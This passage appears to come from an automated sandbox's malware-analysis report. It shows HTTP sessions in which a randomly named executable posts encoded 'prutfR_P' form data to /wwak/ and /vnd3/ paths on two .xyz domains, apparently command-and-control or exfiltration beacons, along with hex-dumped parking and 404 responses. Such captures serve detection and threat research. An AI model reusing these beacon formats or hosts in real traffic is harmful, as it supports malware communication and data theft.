                                                  Data Ascii: prutfR_P=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3x5OokpMeRINgcw8eu0448BC6rXmhB0O0Opu8bDeF3x2Q39UHHAGW31IqQOWOdpr8lS0sNLCU5bXJh3Ilurz+CGEreo8XA098iQ/Ag8M0YecYUFgadLVvkVBhSe5pe2f9l1FKFrPPVKgXlIwbYMXp/9eH9+K9y9bom80XmQQtWePRQ5/fhyW
                                                  Sep 16, 2024 09:39:53.196399927 CEST1236INHTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:53 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1154
                                                  x-request-id: 3d0013b9-96ac-4670-89ef-e265e0dc2b5f
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                                                  set-cookie: parking_session=3d0013b9-96ac-4670-89ef-e265e0dc2b5f; expires=Mon, 16 Sep 2024 07:54:53 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Sep 16, 2024 09:39:53.196472883 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2QwMDEzYjktOTZhYy00NjcwLTg5ZWYtZTI2NWUwZGMyYjVmIiwicGFnZV90aW1lIjoxNzI2NDcyMz


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.549731199.59.243.226802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:55.295613050 CEST1849OUTPOST /wwak/ HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.personal-loans-jp8.xyz
                                                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 68 4f 6f 53 64 4d 4d 41 49 4e 68 63 77 38 58 4f 30 37 34 38 42 6c 36 76 37 71 68 42 6f 30 30 4b 5a 75 38 39 2f 65 44 43 64 32 61 33 39 55 59 58 41 57 53 33 30 63 71 51 2b 6f 4f 64 5a 72 38 6c 53 30 73 4f 54 43 54 6f 62 58 5a 52 33 4c 69 75 72 6e 36 43 48 70 72 65 77 4b 58 42 31 49 38 53 77 2f 41 42 4d 4d 6b 2b 4b 63 58 55 46 69 58 39 4c 7a 76 6c 70 61 68 53 53 50 70 65 71 35 39 6e 56 46 4c 44 65 45 4b 6c 61 69 45 6b 67 43 63 66 41 73 70 62 70 53 48 62 69 65 39 56 4d 31 6f 45 77 6f 56 47 55 69 6d 57 43 41 4f 52 74 4f 56 58 65 64 71 4c 7a 73 43 2f 4f 52 2b 69 4d 34 71 41 34 70 31 6c 2f 55 7a 59 73 75 65 79 67 38 77 44 43 4c 52 46 69 63 53 6e 4d 58 36 56 64 58 45 34 46 31 77 75 66 75 75 63 6d 73 41 73 52 45 6e 68 50 48 63 34 36 6a 34 76 41 46 58 6a 61 61 30 41 36 7a 5a 37 78 78 4e 4d 75 4e 46 48 76 67 37 37 6e 58 4e 69 32 49 2f 2b 32 6e 48 66 35 4c 4d [TRUNCATED]
                                                  Data Ascii: prutfR_P=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3xhOoSdMMAINhcw8XO0748Bl6v7qhBo00KZu89/eDCd2a39UYXAWS30cqQ+oOdZr8lS0sOTCTobXZR3Liurn6CHprewKXB1I8Sw/ABMMk+KcXUFiX9LzvlpahSSPpeq59nVFLDeEKlaiEkgCcfAspbpSHbie9VM1oEwoVGUimWCAORtOVXedqLzsC/OR+iM4qA4p1l/UzYsueyg8wDCLRFicSnMX6VdXE4F1wufuucmsAsREnhPHc46j4vAFXjaa0A6zZ7xxNMuNFHvg77nXNi2I/+2nHf5LMa1KnXTni3WApRfSXSEQl4YfGNZ3sZa6CURIDyuRvLFEBQQrWJ08nuZSx62ejcBTOZsPbv4ISP5PbiXrj1J3oF0b3h1jEQa5L7bEWPBA4mbkPLQPpsWS/6eCOBVtgBpU3PS9fauLMVd+qzTHYzenSb3URtJCkvwF2GHrNA4+4lJ2QbZSbMaTAVZ4xx9ayAUPyWK0ch144jsPk3pK5EDgre61QbjZc+d6FQ4HghY5/g0j3tWDMaCbPvytO8n5m/1yiQ+GsMP4Krdmt1IWUSSv7MXeMANm8CXJ/XegRzu0Qp4R5pA9Ef2tWi/V/sCfx/nvvSZN2EeYYn9QkMJocox1dKUwaLQgZObB7hKHDQ2g+RLRH2CKD2R5yQVu5qhNnTHzZUs24sBofdEHCBn8F9z3Bcc+yujBYiP5Ck9Hsm+yqvlaCK7Nbdy2UlWwuXwX6Jt/SUc1NzAd967zdltvm6wiuGv1huqwrTVjdIKWj/wc5Dhf05V33UeJtBYdO+Os6U5DWkQXXByiAvw8586yVVqTB7Nv1IuaohYZrr0AHdE/F5Bq+kBiGvB9IVYNcIFmeqVfFM1pjHXmot6GvrIbtCaNb0um/kGV6pyurWxlSQUlAwn9DhIMLGsuUmpARCm4bsSguDCWGGOC3BR1gv6PGXk0mLYqJPITC+wXvLv [TRUNCATED]
                                                  Sep 16, 2024 09:39:55.748812914 CEST1236INHTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:55 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1154
                                                  x-request-id: 031f4dda-5d89-4305-8d0f-243cb00ed183
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                                                  set-cookie: parking_session=031f4dda-5d89-4305-8d0f-243cb00ed183; expires=Mon, 16 Sep 2024 07:54:55 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Sep 16, 2024 09:39:55.748838902 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDMxZjRkZGEtNWQ4OS00MzA1LThkMGYtMjQzY2IwMGVkMTgzIiwicGFnZV90aW1lIjoxNzI2NDcyMz


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.549732199.59.243.226802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:39:57.840626955 CEST534OUTGET /wwak/?prutfR_P=E3TGpDthwwVtcd6zArHMi0+elvxdJNsp076mRxbq1wlJhRxdRCVM2u01G8le2+tM+4jqrTcu85UNoN7iByxUa15ZbVJvSSR5vxb+VJw93FLmyr7mIfPMGWfmtP/A6wTj3w==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.personal-loans-jp8.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:39:58.290278912 CEST1236INHTTP/1.1 200 OK
                                                  date: Mon, 16 Sep 2024 07:39:57 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1522
                                                  x-request-id: 3a467895-8111-4853-9000-5f1d204b0026
                                                  cache-control: no-store, max-age=0
                                                  accept-ch: sec-ch-prefers-color-scheme
                                                  critical-ch: sec-ch-prefers-color-scheme
                                                  vary: sec-ch-prefers-color-scheme
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utwIIUkKlT9J6SaYZn/lvpfIOmSz4DHKsGIs5O+mm4jM2kzh/4j+eBu3zycpUx4oz2fe1n8xOXM1pSeAbMwUYA==
                                                  set-cookie: parking_session=3a467895-8111-4853-9000-5f1d204b0026; expires=Mon, 16 Sep 2024 07:54:58 GMT; path=/
                                                  connection: close
                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 74 77 49 49 55 6b 4b 6c 54 39 4a 36 53 61 59 5a 6e 2f 6c 76 70 66 49 4f 6d 53 7a 34 44 48 4b 73 47 49 73 35 4f 2b 6d 6d 34 6a 4d 32 6b 7a 68 2f 34 6a 2b 65 42 75 33 7a 79 63 70 55 78 34 6f 7a 32 66 65 31 6e 38 78 4f 58 4d 31 70 53 65 41 62 4d 77 55 59 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_utwIIUkKlT9J6SaYZn/lvpfIOmSz4DHKsGIs5O+mm4jM2kzh/4j+eBu3zycpUx4oz2fe1n8xOXM1pSeAbMwUYA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                  Sep 16, 2024 09:39:58.290292025 CEST224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2E0Njc4OTUtODExMS00ODUzLTkwMDAtNWYxZDIwNGIwMDI2IiwicGFnZV9
                                                  Sep 16, 2024 09:39:58.290302992 CEST751INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 49 32 4e 44 63 79 4d 7a 6b 34 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 63 47 56 79 63 32 39 75 59 57 77 74 62 47 39 68 62 6e 4d 74 61 6e 41 34 4c 6e 68 35 65
                                                  Data Ascii: 0aW1lIjoxNzI2NDcyMzk4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cucGVyc29uYWwtbG9hbnMtanA4Lnh5ei93d2FrLz9wcnV0ZlJfUD1FM1RHcER0aHd3VnRjZDZ6QXJITWkwK2VsdnhkSk5zcDA3Nm1SeGJxMXdsSmhSeGRSQ1ZNMnUwMUc4bGUyK3RNKzRqcXJUY3U4NVVOb043aUJ5eFVhMTVaYlZKdlNTUjV2eGIrVkp3OT


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.549733162.0.239.141802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:40:03.496592045 CEST794OUTPOST /vnd3/ HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.quantumnests.xyz
                                                  Referer: http://www.quantumnests.xyz/vnd3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 38 68 6f 55 47 31 65 7a 31 38 39 6a 36 4a 6c 6c 72 76 6e 4d 79 48 54 4e 71 35 58 44 69 67 5a 43 56 44 4b 67 6e 66 63 78 46 78 43 7a 33 48 33 57 37 32 79 4b 45 51 6b 59 39 62 58 6b 35 30 57 69 2f 79 4a 43 56 71 31 66 51 31 68 54 6f 34 52 72 43 30 70 58 44 74 66 64 64 68 4a 45 4f 50 4d 42 69 6f 42 52 6d 53 2b 32 51 4f 64 38 2b 38 6d 37 53 32 73 42 31 47 7a 61 59 30 78 75 59 6c 6b 44 4e 59 6e 41 7a 73 72 44 2f 55 6d 52 54 53 75 55 58 6b 6f 44 63 64 76 4e 70 33 63 66 65 72 64 4a 79 71 61 41 72 59 78 43 4d 4a 32 6a 6f 54 68 6d 37 72 59 6d 37 48 4c 38 79 31 67 3d
                                                  Data Ascii: prutfR_P=8apH6GvHlIgh8hoUG1ez189j6JllrvnMyHTNq5XDigZCVDKgnfcxFxCz3H3W72yKEQkY9bXk50Wi/yJCVq1fQ1hTo4RrC0pXDtfddhJEOPMBioBRmS+2QOd8+8m7S2sB1GzaY0xuYlkDNYnAzsrD/UmRTSuUXkoDcdvNp3cferdJyqaArYxCMJ2joThm7rYm7HL8y1g=
                                                  Sep 16, 2024 09:40:04.086756945 CEST1236INHTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:03 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:04.086779118 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                                                  Sep 16, 2024 09:40:04.086791992 CEST448INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                                  Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                                                  Sep 16, 2024 09:40:04.086803913 CEST1236INData Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                                                  Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                                                  Sep 16, 2024 09:40:04.086816072 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                                                  Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                                                  Sep 16, 2024 09:40:04.086828947 CEST448INData Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                                                  Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                                                  Sep 16, 2024 09:40:04.086951971 CEST1236INData Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                                                  Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
